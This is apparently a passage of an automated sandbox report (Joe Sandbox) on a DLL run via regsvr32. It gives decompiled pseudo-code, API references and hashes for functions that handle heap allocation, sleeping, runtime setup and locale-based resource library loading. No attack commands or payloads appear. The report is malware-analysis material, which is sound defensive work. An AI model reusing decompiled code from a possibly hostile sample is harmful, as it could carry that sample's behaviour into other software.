                                                                              • RtlAllocateHeap.NTDLL(?,?,10039645), ref: 1003B0B5
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: c8f6df29da8d836a6bfa1aa0548ae38c929de8fc401aa6d162bd9e252f441e79
                                                                              • Instruction ID: f605f8a10855f1b584606b6d74a2f50efe5dfdc4a25a6690af1e238c05a12964
                                                                              • Opcode Fuzzy Hash: c8f6df29da8d836a6bfa1aa0548ae38c929de8fc401aa6d162bd9e252f441e79
                                                                              • Instruction Fuzzy Hash: 7D118435304BC089EB0ACB65AA11356B790E788BF5F484724AFAD8B7D4EBBDC050C700
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10039550 Relevance: 1.6, APIs: 1, Instructions: 50memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 78%
                                                                              			E10039550(intOrPtr* __rax, long long __rbx, void* __rcx, long long __rdi, long long __rsi, long long _a16, long long _a24, long long _a32) {
				void* _t11;
				void* _t29;
				intOrPtr _t33;
				void* _t36;
				void* _t40;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t45;

				_t37 = __rdi;
				_t26 = __rax;
				_a16 = __rbx;
				_t29 = __rcx;
				if(__rcx > 0xffffffe0) {
					E1003E830(__rax, __rcx);
					E1003AF40(__rax);
					 *__rax = 0xc;
					__eflags = 0;
					return 0;
				} else {
					_a24 = __rsi;
					_t40 =  !=  ? __rcx : __rsi;
					_a32 = __rdi;
					while(1) {
						_t33 =  *0x10075350; // 0x23a0000
						_t22 = _t33;
						if(_t33 == 0) {
							E1003E4F0(E1003E730(_t22, _t26, _t29, _t33, _t36, _t37, _t42, _t43, _t44, _t45), 0x1e, 0, _t29, _t33, _t36, _t37, _t40, _t42, _t43, _t44, _t45);
							E1003B340();
						}
						_t42 = _t40;
						_t11 = RtlAllocateHeap(??, ??, ??); // executed
						_t37 = _t26;
						if(_t26 != 0) {
							break;
						}
						if( *0x10075790 == _t11) {
							E1003AF40(_t26);
							 *_t26 = 0xc;
							goto L9;
						} else {
							if(E1003E830(_t26, _t29) != 0) {
								continue;
							} else {
								L9:
								_t11 = E1003AF40(_t26);
								 *_t26 = 0xc;
							}
						}
						break;
					}
					return _t11;
				}
			}












                                                                              0x10039550
                                                                              0x10039550
                                                                              0x10039558
                                                                              0x1003955d
                                                                              0x10039560
                                                                              0x10039602
                                                                              0x10039607
                                                                              0x10039611
                                                                              0x10039617
                                                                              0x1003961d
                                                                              0x10039566
                                                                              0x10039566
                                                                              0x10039573
                                                                              0x10039577
                                                                              0x10039580
                                                                              0x10039580
                                                                              0x10039587
                                                                              0x1003958a
                                                                              0x10039596
                                                                              0x100395a0
                                                                              0x100395a5
                                                                              0x100395ac
                                                                              0x100395b1
                                                                              0x100395ba
                                                                              0x100395bd
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100395c5
                                                                              0x100395d5
                                                                              0x100395da
                                                                              0x00000000
                                                                              0x100395c7
                                                                              0x100395d1
                                                                              0x00000000
                                                                              0x100395d3
                                                                              0x100395e0
                                                                              0x100395e0
                                                                              0x100395e5
                                                                              0x100395e5
                                                                              0x100395d1
                                                                              0x00000000
                                                                              0x100395c5
                                                                              0x10039601
                                                                              0x10039601

                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(?,?,?,?,1003D3CA,?,?,?,?,10042A23,?,?,?,?,10042AF7), ref: 100395B1
                                                                                • Part of subcall function 1003B340: GetModuleHandleA.KERNEL32(?,?,00000028,100395A5,?,?,?,?,1003D3CA,?,?,?,?,10042A23), ref: 1003B34F
                                                                                • Part of subcall function 1003B340: GetProcAddress.KERNEL32(?,?,00000028,100395A5,?,?,?,?,1003D3CA,?,?,?,?,10042A23), ref: 1003B364
                                                                                • Part of subcall function 1003B340: ExitProcess.KERNEL32 ref: 1003B375
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AddressAllocateExitHandleHeapModuleProcProcess
                                                                              • String ID:
                                                                              • API String ID: 3260311492-0
                                                                              • Opcode ID: 15f455f5dae5107b671118c7992e5556068d1c5ad00ac46e7a614803365e4d18
                                                                              • Instruction ID: e551b017f564014bd15c8eced4358f2f54d2db5506e45e81a0c32f6725c4e4f5
                                                                              • Opcode Fuzzy Hash: 15f455f5dae5107b671118c7992e5556068d1c5ad00ac46e7a614803365e4d18
                                                                              • Instruction Fuzzy Hash: B711863970578189EA07DB62984136A3390E789BD6F440221FB8A4B7D5DF7DD8818710
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1003B6C0 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E1003B6C0(void* __eflags, long long __rax, void* __rcx, void* __rdx) {
				void* _t2;
				void* _t11;
				long long _t13;

				_t13 = __rax;
				_t2 = E1003CD90(__rax); // executed
				E1003E1E0(E10042B70(E10042E70(E10042840(E1003C6E0(E10042E80(E1003E820(_t2, __rax), __rax), __rax), __rax), __rax), __rax));
				_t11 = E1003CD20(E10040420(__rax), __rax, 0x1003b6a0);
				 *0x1006f660 = _t13;
				return _t11;
			}






                                                                              0x1003b6c0
                                                                              0x1003b6c6
                                                                              0x1003b701
                                                                              0x1003b715
                                                                              0x1003b71a
                                                                              0x1003b726

                                                                              APIs
                                                                                • Part of subcall function 1003CD90: FlsGetValue.KERNEL32(?,?,?,?,1004824D), ref: 1003CD9F
                                                                              • _initp_misc_winsig.LIBCMT ref: 1003B6F9
                                                                                • Part of subcall function 1003CD20: FlsGetValue.KERNEL32(?,?,00000000,100482A0), ref: 1003CD34
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Value$_initp_misc_winsig
                                                                              • String ID:
                                                                              • API String ID: 3644512426-0
                                                                              • Opcode ID: 2a0c3e3b8c8daea2d58702faf87a034d783682fb3f0d208994ec8e2e4f709f17
                                                                              • Instruction ID: 7f5e0051cc1cc4c40a8a2beb7b0508987a059d9fff318b1fe4812506fa3d3bf1
                                                                              • Opcode Fuzzy Hash: 2a0c3e3b8c8daea2d58702faf87a034d783682fb3f0d208994ec8e2e4f709f17
                                                                              • Instruction Fuzzy Hash: C1E07568B9160A49DD0AEF63782376A1741DBCABC1F982434B94B8E353DE3CA4508394
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1003D420 Relevance: 1.3, APIs: 1, Instructions: 37sleepCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 65%
                                                                              			E1003D420(long long __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, long long __r12, long long _a8, long long _a16, long long _a24, long long _a32) {
				long long _v8;
				void* _t12;
				void* _t18;
				long long _t21;
				long long _t29;
				void* _t32;
				void* _t35;
				void* _t37;

				_t29 = __rdi;
				_t23 = __rbx;
				_t21 = __rax;
				_a16 = __rbp;
				_a24 = __rsi;
				_a32 = __rdi;
				_v8 = __r12;
				_t32 = __rdx;
				_t35 = __rcx;
				r12d = 0xffffffff;
				_a8 = __rbx;
				while(1) {
					r8d = 0;
					_t12 = E1003B030(_t12, _t23, _t35, _t32, _t29, _t32, _t35, _t37); // executed
					_t23 = _t21;
					if(_t21 != 0) {
						break;
					}
					_t18 =  *0x10075348 - _t12; // 0x0
					if(_t18 > 0) {
						Sleep();
						_t6 = _t29 + 0x3e8; // 0x3e8
						r11d = _t6;
						_t14 =  >  ? r12d : r11d;
						if(( >  ? r12d : r11d) != r12d) {
							continue;
						} else {
						}
					}
					break;
				}
				return _t12;
			}











                                                                              0x1003d420
                                                                              0x1003d420
                                                                              0x1003d420
                                                                              0x1003d424
                                                                              0x1003d429
                                                                              0x1003d42e
                                                                              0x1003d433
                                                                              0x1003d438
                                                                              0x1003d43b
                                                                              0x1003d43e
                                                                              0x1003d444
                                                                              0x1003d450
                                                                              0x1003d450
                                                                              0x1003d459
                                                                              0x1003d461
                                                                              0x1003d464
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1003d466
                                                                              0x1003d46c
                                                                              0x1003d470
                                                                              0x1003d476
                                                                              0x1003d476
                                                                              0x1003d487
                                                                              0x1003d48e
                                                                              0x00000000
                                                                              0x1003d490
                                                                              0x1003d490
                                                                              0x1003d48e
                                                                              0x00000000
                                                                              0x1003d46c
                                                                              0x1003d4b0

                                                                              APIs
                                                                              • Sleep.KERNEL32(?,?,?,?,1003CFF7,?,?,?,?,1003AF49,?,?,?,?,10039645), ref: 1003D470
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: 061e62c5c517719b0f9d1377821d305bc5e043470bd238e1d0493dc850441f9b
                                                                              • Instruction ID: f9a60749766bb007b274fe64f4746796c707333c098a56630cbef85bd9f41ae3
                                                                              • Opcode Fuzzy Hash: 061e62c5c517719b0f9d1377821d305bc5e043470bd238e1d0493dc850441f9b
                                                                              • Instruction Fuzzy Hash: 49012836624BC48AD6559F02B84034EB3A6F389BD1F591125FFD907B68DB7DE8918B00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Non-executed Functions

                                                                              Function 10025520 Relevance: 47.6, APIs: 20, Strings: 7, Instructions: 331registrylibraryloaderCOMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 23%
                                                                              			E10025520(char* __rcx, void* __r8, char* __r9, void* __r11) {
				signed int _v56;
				char _v616;
				short _v622;
				short _v624;
				char _v1144;
				char _v1184;
				signed int* _v1192;
				long long _v1200;
				long long _v1216;
				long long _v1240;
				intOrPtr _v1244;
				char _v1248;
				long long _v1256;
				int _v1268;
				int _v1272;
				int _v1276;
				int _v1280;
				signed short _v1288;
				char _v1292;
				char _v1296;
				signed int _v1304;
				signed int* _v1312;
				signed int _v1320;
				void* _v1328;
				signed short* _v1336;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r12;
				int _t92;
				signed int _t93;
				signed int _t117;
				signed int _t118;
				void* _t120;
				signed short _t121;
				signed short _t126;
				signed short _t130;
				signed int _t135;
				signed int _t136;
				void* _t137;
				signed int _t139;
				signed int _t140;
				signed short _t146;
				signed short _t150;
				signed int _t164;
				signed int _t174;
				void* _t175;
				signed long long _t180;
				signed long long _t181;
				signed int* _t184;
				long long* _t185;
				signed int* _t190;
				char* _t214;
				long long* _t217;
				signed long long _t223;
				signed long long _t224;
				void* _t226;
				signed int _t227;
				signed long long _t228;
				long long* _t231;
				long long* _t232;
				long long* _t234;
				long long* _t237;
				void* _t238;
				void* _t239;
				char* _t240;
				void* _t241;
				void* _t242;
				void* _t243;

				_t239 = __r11;
				_t236 = __r9;
				_t228 =  &_v1328;
				_v1256 = 0xfffffffe;
				_t180 =  *0x1006f4c8; // 0x6f13091946cb
				_t181 = _t180 ^ _t228;
				_v56 = _t181;
				_t240 = __rcx;
				_v1320 = 0;
				_t135 = 0;
				GetModuleHandleW(??);
				_t224 = _t181;
				_t214 = "GetUserDefaultUILanguage";
				GetProcAddress(??, ??);
				if(_t181 == 0) {
					GetVersion();
					asm("bt eax, 0x1f");
					if(__eflags >= 0) {
						GetModuleHandleW();
						__eflags = _t181;
						if(_t181 != 0) {
							_v1320 = 0;
							_v1336 =  &_v1320;
							_t236 = 0x1002471c;
							_t32 = _t214 - 0xf; // 0x1
							r8d = _t32;
							EnumResourceLanguagesW(??, ??, ??, ??, ??);
							r11d = _v1320 & 0x0000ffff;
							__eflags = r11w;
							if(r11w != 0) {
								_t146 = r11w & 0xffffffff;
								_t139 = _t146 & 0x3ff;
								__eflags = _t146 & 0xfc00 | _t139;
								_v1280 = ConvertDefaultLocale(??);
								_t143 = _t139;
								_v1276 = ConvertDefaultLocale(??);
								_t135 = 2;
							}
						}
					} else {
						_v1192 = _t190;
						_v1336 =  &_v1192;
						r9d = 0x20019;
						r8d = 0;
						_t117 = RegOpenKeyExW(??, ??, ??, ??, ??);
						__eflags = _t117;
						if(_t117 == 0) {
							_v1292 = 0x20;
							_v1328 =  &_v1292;
							_v1336 =  &_v1184;
							_t236 =  &_v1296;
							r8d = 0;
							_t118 = RegQueryValueExW(??, ??, ??, ??, ??, ??);
							__eflags = _t118;
							if(_t118 == 0) {
								__eflags = _v1296 - 1;
								if(_v1296 == 1) {
									_t120 = E1003B7E0(_t175,  &_v1184, _t190,  &_v1184, L"%x", _t224, _t226,  &_v1288,  &_v1296, _t238, __rcx, _t241, _t242, _t243);
									__eflags = _t120 - 1;
									if(_t120 == 1) {
										_t121 = _v1288;
										_v1320 = _t121;
										_t150 = _t121 & 0x0000ffff;
										_t140 = _t150 & 0x3ff;
										__eflags = _t150 & 0xfc00 | _t140;
										_v1280 = ConvertDefaultLocale(??);
										_t143 = _t140;
										_v1276 = ConvertDefaultLocale(??);
										_t135 = 2;
									}
								}
							}
							RegCloseKey();
						}
					}
				} else {
					_t126 =  *_t181();
					_v1320 = _t126;
					_v1280 = ConvertDefaultLocale(??);
					_t143 = _t126 & 0x3ff;
					_v1276 = ConvertDefaultLocale(??);
					_t135 = 2;
					GetProcAddress(??, ??);
					if(_t181 != 0) {
						_t130 =  *_t181();
						_v1320 = _t130;
						_v1272 = ConvertDefaultLocale(??);
						_t143 = _t130 & 0x3ff;
						_v1268 = ConvertDefaultLocale(??);
						_t135 = 4;
					}
				}
				 *((intOrPtr*)(_t228 + 0x58 + _t135 * 4)) = 0x800;
				_t136 = _t135 + 1;
				_v622 = 0;
				_v624 = 0;
				r8d = 0x105;
				if(GetModuleFileNameW(??, ??, ??) != 0) {
					E1003A240(_t85, _t143, 0,  &_v1248,  &_v1144, _t223);
					_v1248 = 0x38;
					_v1240 =  &_v1144;
					_v1216 = 0x3e8;
					_v1200 = 0x10000000;
					_v1244 = 0x88;
					_t50 = _t223 - 0x39; // -1
					E10024734( &_v1144,  &_v1312, _t50);
					_t217 =  *0x100748c0; // 0x0
					__eflags = _t217;
					if(_t217 == 0) {
						_t184 = _v1312;
						L20:
						_t231 =  *0x100748d0; // 0x0
						__eflags = _t231;
						if(_t231 != 0) {
							__eflags = _t184 - 0xffffffff;
							if(_t184 != 0xffffffff) {
								__eflags = _v1304;
								if(_v1304 == 0) {
									_t217 =  &_v1304;
									 *_t231();
									_t184 = _v1312;
								}
							}
						}
						L24:
						_t227 = _t136;
						__eflags = _t136;
						if(_t136 <= 0) {
							L62:
							_t232 =  *0x100748c8; // 0x0
							__eflags = _t232;
							if(_t232 != 0) {
								__eflags = _t184 - 0xffffffff;
								if(_t184 != 0xffffffff) {
									_t237 =  *0x100748d8; // 0x0
									__eflags = _t237;
									if(_t237 != 0) {
										__eflags = _v1304;
										if(_v1304 != 0) {
											_v1304 = 0;
											_t143 = 0;
											__eflags = 0;
											 *_t237();
											_t232 =  *0x100748c8; // 0x0
											_t184 = _v1312;
										}
									}
									 *_t232();
								}
							}
							__eflags = 0;
							L69:
							return E10038D20(_t143, _v56 ^ _t228);
						} else {
							goto L25;
						}
						while(1) {
							L25:
							_t143 =  *(_t228 + 0x58 + _t223 * 4);
							__eflags =  *(_t228 + 0x58 + _t223 * 4) - 0x800;
							if( *(_t228 + 0x58 + _t223 * 4) != 0x800) {
								goto L32;
							}
							_t233 = 0x1005a9e8;
							_t164 = 4;
							_t201 =  &_v1192;
							_t93 = E1003B730(_t184, _t190,  &_v1192, _t217, _t223, 0x10000000, _t227, 0x1005a9e8);
							__eflags = _t93;
							if(_t93 == 0) {
								L33:
								E1003AF40(_t184);
								_t174 =  *_t184;
								E1003AF40(_t184);
								 *_t184 = 0;
								_t184 =  &_v1192;
								_v1336 = _t184;
								_t236 = _t240;
								_t164 = 0x112;
								_t69 = _t217 - 1; // 0x111
								r8d = _t69;
								_t201 =  &_v616;
								_t137 = E1003AEC0(_t240);
								E1003AF40(_t184);
								__eflags =  *_t184;
								if( *_t184 == 0) {
									E1003AF40(_t184);
									 *_t184 = _t174;
									L41:
									__eflags = _t137 - 0xffffffff;
									if(_t137 == 0xffffffff) {
										L44:
										__eflags = 0;
										L45:
										__eflags = _t190;
										if(_t190 != 0) {
											L54:
											_t185 =  *0x100748c8; // 0x0
											__eflags = _t185;
											if(_t185 != 0) {
												__eflags = _v1312 - 0xffffffff;
												if(_v1312 != 0xffffffff) {
													_t234 =  *0x100748d8; // 0x0
													__eflags = _t234;
													if(_t234 != 0) {
														__eflags = _v1304;
														if(_v1304 != 0) {
															_v1304 = 0;
															_t143 = 0;
															__eflags = 0;
															 *_t234();
															_t185 =  *0x100748c8; // 0x0
														}
													}
													 *_t185();
												}
											}
											goto L69;
										}
										L46:
										_t223 = _t223 + 1;
										__eflags = _t223 - _t227;
										if(_t223 >= _t227) {
											_t184 = _v1312;
											goto L62;
										}
										continue;
									}
									__eflags = _t137 - 0x112;
									if(_t137 >= 0x112) {
										goto L44;
									}
									LoadLibraryW();
									_t190 = _t184;
									goto L45;
								}
								E1003AF40(_t184);
								__eflags =  *_t184;
								if( *_t184 == 0) {
									goto L41;
								}
								__eflags =  *_t184 - 0xc;
								if( *_t184 == 0xc) {
									L53:
									_t143 = 0x8007000e;
									E10009538(0x8007000e, _t164, _t184, _t190, _t201, _t217, _t223, _t233, _t236, _t239);
									goto L54;
								}
								__eflags =  *_t184 - 0x16;
								if( *_t184 == 0x16) {
									L52:
									E10009538(0x80070057, _t164, _t184, _t190, _t201, _t217, _t223, _t233, _t236, _t239);
									asm("int3");
									goto L53;
								}
								__eflags =  *_t184 - 0x22;
								if( *_t184 == 0x22) {
									goto L52;
								}
								__eflags =  *_t184 - 0x50;
								if( *_t184 != 0x50) {
									L51:
									E10009538(0x80004005, _t164, _t184, _t190, _t201, _t217, _t223, _t233, _t236, _t239);
									asm("int3");
									goto L52;
								}
								goto L41;
							}
							__eflags = _t93 - 0xc;
							if(_t93 == 0xc) {
								L50:
								E100164FC();
								asm("int3");
								goto L51;
							}
							__eflags = _t93 - 0x16;
							if(_t93 == 0x16) {
								L49:
								E10016544();
								asm("int3");
								goto L50;
							}
							__eflags = _t93 - 0x22;
							if(_t93 == 0x22) {
								goto L49;
							}
							__eflags = _t93 - 0x50;
							if(_t93 != 0x50) {
								E10016544();
								asm("int3");
								goto L49;
							}
							goto L33;
							L32:
							r9d = 4;
							_t233 =  &_v1192;
							_t92 = GetLocaleInfoW(??, ??, ??, ??);
							__eflags = _t92;
							if(_t92 == 0) {
								goto L46;
							}
							goto L33;
						}
					}
					_t184 = _v1312;
					__eflags = _t184 - 0xffffffff;
					if(_t184 != 0xffffffff) {
						goto L24;
					}
					 *_t217();
					_v1312 = _t184;
					__eflags = _t184 - 0xffffffff;
					_t143 = _t143 & 0xffffff00 | _t184 != 0xffffffff;
					__eflags = _t143;
					if(_t143 == 0) {
						goto L24;
					}
					goto L20;
				}
				goto L69;
			}









































































                                                                              0x10025520
                                                                              0x10025520
                                                                              0x10025527
                                                                              0x1002552e
                                                                              0x10025537
                                                                              0x1002553e
                                                                              0x10025541
                                                                              0x10025549
                                                                              0x1002554c
                                                                              0x10025553
                                                                              0x1002555c
                                                                              0x10025562
                                                                              0x10025565
                                                                              0x1002556f
                                                                              0x10025578
                                                                              0x1002560d
                                                                              0x10025613
                                                                              0x10025617
                                                                              0x1002570b
                                                                              0x10025711
                                                                              0x10025714
                                                                              0x10025716
                                                                              0x10025720
                                                                              0x10025725
                                                                              0x10025731
                                                                              0x10025731
                                                                              0x10025738
                                                                              0x1002573e
                                                                              0x10025744
                                                                              0x10025748
                                                                              0x1002574a
                                                                              0x10025757
                                                                              0x10025762
                                                                              0x1002576a
                                                                              0x1002576e
                                                                              0x10025776
                                                                              0x1002577a
                                                                              0x1002577a
                                                                              0x10025748
                                                                              0x1002561d
                                                                              0x1002561d
                                                                              0x1002562d
                                                                              0x10025632
                                                                              0x10025638
                                                                              0x10025649
                                                                              0x1002564f
                                                                              0x10025651
                                                                              0x10025657
                                                                              0x10025664
                                                                              0x10025671
                                                                              0x10025676
                                                                              0x1002567b
                                                                              0x10025688
                                                                              0x1002568e
                                                                              0x10025690
                                                                              0x10025692
                                                                              0x10025697
                                                                              0x100256ad
                                                                              0x100256b2
                                                                              0x100256b5
                                                                              0x100256b7
                                                                              0x100256bb
                                                                              0x100256c0
                                                                              0x100256cc
                                                                              0x100256d7
                                                                              0x100256df
                                                                              0x100256e3
                                                                              0x100256eb
                                                                              0x100256ef
                                                                              0x100256ef
                                                                              0x100256b5
                                                                              0x10025697
                                                                              0x100256fc
                                                                              0x100256fc
                                                                              0x10025651
                                                                              0x1002557e
                                                                              0x1002557e
                                                                              0x10025580
                                                                              0x100255a4
                                                                              0x100255a8
                                                                              0x100255b0
                                                                              0x100255b4
                                                                              0x100255c3
                                                                              0x100255cc
                                                                              0x100255d2
                                                                              0x100255d4
                                                                              0x100255f3
                                                                              0x100255f7
                                                                              0x100255ff
                                                                              0x10025603
                                                                              0x10025603
                                                                              0x100255cc
                                                                              0x10025782
                                                                              0x1002578a
                                                                              0x1002578d
                                                                              0x10025797
                                                                              0x100257a1
                                                                              0x100257c1
                                                                              0x100257d9
                                                                              0x100257de
                                                                              0x100257ea
                                                                              0x100257f2
                                                                              0x100257fe
                                                                              0x10025806
                                                                              0x1002580e
                                                                              0x10025817
                                                                              0x1002581d
                                                                              0x10025824
                                                                              0x10025827
                                                                              0x1002584d
                                                                              0x10025852
                                                                              0x10025852
                                                                              0x10025859
                                                                              0x1002585c
                                                                              0x1002585e
                                                                              0x10025862
                                                                              0x10025864
                                                                              0x1002586a
                                                                              0x1002586c
                                                                              0x10025874
                                                                              0x10025877
                                                                              0x10025877
                                                                              0x1002586a
                                                                              0x10025862
                                                                              0x1002587c
                                                                              0x1002587e
                                                                              0x10025881
                                                                              0x10025883
                                                                              0x10025a22
                                                                              0x10025a22
                                                                              0x10025a29
                                                                              0x10025a2c
                                                                              0x10025a2e
                                                                              0x10025a32
                                                                              0x10025a34
                                                                              0x10025a3b
                                                                              0x10025a3e
                                                                              0x10025a45
                                                                              0x10025a48
                                                                              0x10025a4a
                                                                              0x10025a53
                                                                              0x10025a53
                                                                              0x10025a55
                                                                              0x10025a58
                                                                              0x10025a5f
                                                                              0x10025a5f
                                                                              0x10025a48
                                                                              0x10025a67
                                                                              0x10025a67
                                                                              0x10025a32
                                                                              0x10025a6a
                                                                              0x10025a6c
                                                                              0x10025a89
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10025889
                                                                              0x10025889
                                                                              0x10025889
                                                                              0x1002588d
                                                                              0x10025893
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10025895
                                                                              0x1002589c
                                                                              0x100258a1
                                                                              0x100258a9
                                                                              0x100258ae
                                                                              0x100258b0
                                                                              0x100258f8
                                                                              0x100258f8
                                                                              0x100258fd
                                                                              0x100258ff
                                                                              0x10025904
                                                                              0x1002590a
                                                                              0x10025912
                                                                              0x10025917
                                                                              0x1002591a
                                                                              0x1002591f
                                                                              0x1002591f
                                                                              0x10025923
                                                                              0x10025930
                                                                              0x10025932
                                                                              0x10025937
                                                                              0x1002593a
                                                                              0x1002595c
                                                                              0x10025961
                                                                              0x10025963
                                                                              0x10025963
                                                                              0x10025966
                                                                              0x10025983
                                                                              0x10025983
                                                                              0x10025985
                                                                              0x10025985
                                                                              0x10025988
                                                                              0x100259cf
                                                                              0x100259cf
                                                                              0x100259d6
                                                                              0x100259d9
                                                                              0x100259e0
                                                                              0x100259e4
                                                                              0x100259e6
                                                                              0x100259ed
                                                                              0x100259f0
                                                                              0x100259f7
                                                                              0x100259fa
                                                                              0x100259fc
                                                                              0x10025a05
                                                                              0x10025a05
                                                                              0x10025a07
                                                                              0x10025a0a
                                                                              0x10025a11
                                                                              0x100259fa
                                                                              0x10025a16
                                                                              0x10025a16
                                                                              0x100259e4
                                                                              0x00000000
                                                                              0x10025a18
                                                                              0x1002598a
                                                                              0x1002598a
                                                                              0x1002598e
                                                                              0x10025991
                                                                              0x10025a1d
                                                                              0x00000000
                                                                              0x10025a1d
                                                                              0x00000000
                                                                              0x10025997
                                                                              0x10025968
                                                                              0x1002596e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10025978
                                                                              0x1002597e
                                                                              0x00000000
                                                                              0x1002597e
                                                                              0x1002593c
                                                                              0x10025941
                                                                              0x10025944
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10025946
                                                                              0x10025949
                                                                              0x100259c4
                                                                              0x100259c4
                                                                              0x100259c9
                                                                              0x00000000
                                                                              0x100259c9
                                                                              0x1002594b
                                                                              0x1002594e
                                                                              0x100259b9
                                                                              0x100259be
                                                                              0x100259c3
                                                                              0x00000000
                                                                              0x100259c3
                                                                              0x10025950
                                                                              0x10025953
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10025955
                                                                              0x10025958
                                                                              0x100259ae
                                                                              0x100259b3
                                                                              0x100259b8
                                                                              0x00000000
                                                                              0x100259b8
                                                                              0x00000000
                                                                              0x1002595a
                                                                              0x100258b2
                                                                              0x100258b5
                                                                              0x100259a8
                                                                              0x100259a8
                                                                              0x100259ad
                                                                              0x00000000
                                                                              0x100259ad
                                                                              0x100258bb
                                                                              0x100258be
                                                                              0x100259a2
                                                                              0x100259a2
                                                                              0x100259a7
                                                                              0x00000000
                                                                              0x100259a7
                                                                              0x100258c4
                                                                              0x100258c7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100258cd
                                                                              0x100258d0
                                                                              0x1002599c
                                                                              0x100259a1
                                                                              0x00000000
                                                                              0x100259a1
                                                                              0x00000000
                                                                              0x100258d8
                                                                              0x100258d8
                                                                              0x100258de
                                                                              0x100258ea
                                                                              0x100258f0
                                                                              0x100258f2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100258f2
                                                                              0x10025889
                                                                              0x10025829
                                                                              0x1002582e
                                                                              0x10025832
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10025839
                                                                              0x1002583b
                                                                              0x10025840
